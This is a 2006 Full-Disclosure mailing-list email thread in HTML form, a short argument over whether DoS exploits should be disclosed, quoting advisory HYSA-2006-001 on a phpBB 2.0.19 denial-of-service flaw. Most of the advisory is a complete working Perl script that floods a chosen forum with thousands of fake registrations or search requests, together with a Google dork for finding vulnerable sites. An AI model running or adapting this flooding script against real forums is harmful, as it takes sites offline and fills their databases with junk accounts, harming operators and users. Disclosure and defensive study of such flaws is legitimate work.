so what youre saying is that DoS exploits shouldnt be disclosed?<br><br>
<div><span class="gmail_quote">On 1/25/06, <b class="gmail_sendername">Edward Pearson</b> &lt;<a href="mailto:Ed@unityitservices.co.uk">Ed@unityitservices.co.uk</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">
<div dir="ltr" align="left"><span><font face="Arial" color="#0000ff" size="2">The less said about DoS attacks the better.&nbsp;A tactic&nbsp;mostly employed by asexual teenagers who live in their parent's basement and call themselves &quot;h4x0rz&quot;.
</font></span></div>
<div dir="ltr" align="left"><span><font face="Arial" color="#0000ff" size="2">&nbsp;</font></span><span>&nbsp;</span></div>
<div dir="ltr" align="left">
<hr>
</div>
<div dir="ltr" align="left"><font face="Tahoma" size="2"><b>From:</b> <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:full-disclosure-bounces@lists.grok.org.uk" target="_blank">full-disclosure-bounces@lists.grok.org.uk
</a> [mailto:<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:full-disclosure-bounces@lists.grok.org.uk" target="_blank">full-disclosure-bounces@lists.grok.org.uk</a>] <b>On Behalf Of </b>h4cky0u<br>
<b>Sent:</b> 25 January 2006 14:44<br><b>To:</b> <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:full-disclosure@lists.grok.org.uk" target="_blank">full-disclosure@lists.grok.org.uk</a><br><b>Cc:</b>
 <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:bugtraq@securityfocus.com" target="_blank">bugtraq@securityfocus.com</a><br><b>Subject:</b> [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php
 DOS Vulnerability<br></font><br>&nbsp;</div>
<div><span class="e" id="q_1090212cf1bcc5b2_1">
<div></div><pre>------------------------------------------------------<br>      HYSA-2006-001 <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://h4cky0u.org/" target="_blank">h4cky0u.org</a> Advisory 010
<br>------------------------------------------------------<br>Date - Wed Jan 25 2006
<br><br><br>TITLE:<br>======<br><br>phpBB 2.0.19 search.php and profile.php DOS Vulnerability<br><br><br>SEVERITY:<br>=========<br><br>High<br><br><br>SOFTWARE:<br>=========<br><br>phpBB 2.0.19 and prior<br><br><br>INFO:
<br>
=====<br><br>phpBB is a high powered, fully scalable, and highly customizable <br>Open Source bulletin board package. phpBB has a user-friendly <br>interface, simple and straightforward administration panel, and <br>helpful FAQ. Based on the powerful PHP server language and your 
<br>choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, <br>phpBB is the ideal free community solution for all web sites.<br><br>Support Website : <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.phpbb.com/" target="_blank">
http://www.phpbb.com</a><br>
<br><br>BUG DESCRIPTION:<br>================<br><br>The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -<br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://h4cky0u.org/viewtopic.php?t=637" target="_blank">
http://h4cky0u.org/viewtopic.php?t=637
</a><br><br>This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-<br><br>profile.php &lt;&lt; By registering as many users as you can. 
<br>search.php  &lt;&lt; By searching in a way that the db cannot understand.<br><br><br>Proof Of Concept Code:<br>======================<br><br>#!/usr/bin/perl <br>####################################### <br>##   Recoded by: mix2mix and Elioni of 
<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://ahg-khf.org/" target="_blank">http://ahg-khf.org</a><br>##   And h4cky0u Security Forums (<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://h4cky0u.org/" target="_blank">
http://h4cky0u.org</a>) <br>##   Name: phpBBDoSReloaded<br>##   Original Author: HaCkZaTaN of Neo Security Team 
<br>##   Tested on phpBB 2.0.19 and earlier versions<br>##   Ported to perl by g30rg3_x<br>##   Date: 25/01/06<br>####################################### <br>use IO::Socket; <br><br>## Initialized X <br>$x = 0; <br><br>print q(
<br>  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN<br>  Recoded by Albanian Hackers Group &amp;<br>  h4cky0u Security Forums        <br><br>); <br>print q(Host |without-&gt; <a>http://www.|</a> ); 
<br>$host = &lt;STDIN&gt;; <br>chop ($host); <br><br>print q(Path |example-&gt; /phpBB2/ or /| ); <br>$pth = &lt;STDIN&gt;; <br>chop ($pth); <br><br>print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
<br>$type = &lt;STDIN&gt;; <br>chop ($type); <br><br>## Tipi pėr regjistrim <br>if($type == 1){ <br><br>## User Loop for 9999 loops (enough for Flood xDDDD) <br>while($x != 9999) <br>{ <br><br>## Antari qė regjistrohet automatikishtė &quot;X&quot; 
<br>$uname = &quot;username=AHG__&quot; . &quot;$x&quot;; <br><br>## Emaili qė regjistrohet ne bazėn &quot;X&quot; <br>$umail = &quot;&amp;email=AHG__&quot; . &quot;$x&quot;; <br><br>$postit = &quot;$uname&quot;.&quot;$umail&quot;.&quot;%40ahg-
crew.org&amp;new_password=0123456&amp;password_confirm=0123456&amp;icq=&amp;aim=N%2FA&amp;msn=&amp;yim=&amp;website=&amp;location=&amp;occupation=&amp;interests=&amp;signature=&amp;viewemail=0&amp;hideonline=0&amp;notifyreply=0&amp;notifypm=1&amp;popup_pm=1&amp;attachsig=1&amp;allowbbcode=1&amp;allowhtml=0&amp;allowsmilies=1&amp;language=english&amp;style=2&amp;timezone=0&amp;dateformat=D+M+d%2C+Y+g%3Ai+a&amp;mode=register&amp;agreed=true&amp;coppa=0&amp;submit=Submit

&quot;; <br><br>$lrg = length $postit; <br><br>my $sock = new IO::Socket::INET ( <br>                                 PeerAddr =&gt; &quot;$host&quot;, <br>                                 PeerPort =&gt; &quot;80&quot;, 
<br>
                                 Proto =&gt; &quot;tcp&quot;, <br>                                ); <br>die &quot;\nNuk mundem te lidhemi me hostin sepse ėsht dosirat ose nuk egziston: $!\n&quot; unless $sock; <br><br>## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
<br>print $sock &quot;POST $pth&quot;.&quot;profile.php HTTP/1.1\n&quot;; <br>print $sock &quot;Host: $host\n&quot;; <br>print $sock &quot;Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n&quot;; 
<br>print $sock &quot;Referer: $host\n&quot;; <br>print $sock &quot;Accept-Language: en-us\n&quot;; <br>print $sock &quot;Content-Type: application/x-www-form-urlencoded\n&quot;; <br>print $sock &quot;Accept-Encoding: gzip, deflate\n&quot;; 
<br>print $sock &quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n&quot;; <br>print $sock &quot;Connection: Keep-Alive\n&quot;; <br>print $sock &quot;Cache-Control: no-cache\n&quot;; 
<br>print $sock &quot;Content-Length: $lrg\n\n&quot;; <br>print $sock &quot;$postit\n&quot;; <br>close($sock); <br><br>## Print a &quot;+&quot; for every loop <br>syswrite STDOUT, &quot;+&quot;; <br><br>$x++; <br>} <br><br>

## Tipi 2-shė pėr Kėrkim(Flood) <br>} <br>elsif ($type == 2){ <br><br>while($x != 9999) <br>{ <br>## Final Search String to Send <br>$postit = &quot;search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&amp;search_terms=any&amp;search_author=&amp;search_forum=-1&amp;search_time=0&amp;search_fields=msgonly&amp;search_cat=-1&amp;sort_by=0&amp;sort_dir=ASC&amp;show_results=posts&amp;return_chars=200&quot;; 
<br><br>## Posit Length <br>$lrg = length $postit; <br><br>## Connect Socket with Variables Provided By User <br>my $sock = new IO::Socket::INET ( <br>                                 PeerAddr =&gt; &quot;$host&quot;, <br>

                                 PeerPort =&gt; &quot;80&quot;, <br>                                 Proto =&gt; &quot;tcp&quot;, <br>                                ); <br>die &quot;\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n&quot; unless $sock; 
<br><br>## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums <br>print $sock &quot;POST $pth&quot;.&quot;search.php?mode=results HTTP/1.1\n&quot;; <br>print $sock &quot;Host: $host\n&quot;; <br>

print $sock &quot;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n&quot;; <br>print $sock &quot;Referer: $host\n&quot;; <br>print $sock &quot;Accept-Language: en-us\n&quot;; 
<br>print $sock &quot;Content-Type: application/x-www-form-urlencoded\n&quot;; <br>print $sock &quot;Accept-Encoding: gzip, deflate\n&quot;; <br>print $sock &quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8

) Gecko/20050511 Firefox/1.0.4\n&quot;; <br>print $sock &quot;Connection: Keep-Alive\n&quot;; <br>print $sock &quot;Cache-Control: no-cache\n&quot;; <br>print $sock &quot;Content-Length: $lrg\n\n&quot;; <br>print $sock &quot;$postit\n&quot;; 
<br>close($sock); <br><br>## Print a &quot;+&quot; for every loop <br>syswrite STDOUT, &quot;+&quot;; <br><br>## Increment X in One for every Loop <br>$x++; <br>} <br>}else{ <br>## STF??? Qfarė keni Shtypur <br>   die &quot;Mundėsia nuk Lejohet +_-???\n&quot;; 
<br>}<br><br><br>FIX:<br>====<br><br>No fix available as of date.<br><br><br>GOOGLEDORK:<br>===========<br><br>&quot;Powered by phpBB&quot; <br><br><br>CREDITS:<br>========<br><br>- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.
<br><br><br>- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -<br><br>Web : <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://ahg-khf.org/" target="_blank">
http://ahg-khf.org</a><br><br>mail : webmaster at ahg-khf dot org<br><br>
<br>- Co Researcher -<br><br>h4cky0u of h4cky0u Security Forums.<br><br>mail : h4cky0u at gmail dot com<br><br>web : <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.h4cky0u.org/" target="_blank">
http://www.h4cky0u.org</a><br><br><br>ORIGINAL ADVISORY:<br>==================
<br><br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt" target="_blank">http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt</a><br><br></pre>
-- <br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.h4cky0u.org/" target="_blank">http://www.h4cky0u.org</a><br>(In)Security at its best... </span></div><br>_______________________________________________
<br>Full-Disclosure - We believe in it.<br>Charter: <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://secunia.com/" target="_blank">http://secunia.com/</a><br><br></blockquote></div><br><br clear="all"><br>-- <br>
smile tomorrow will be worse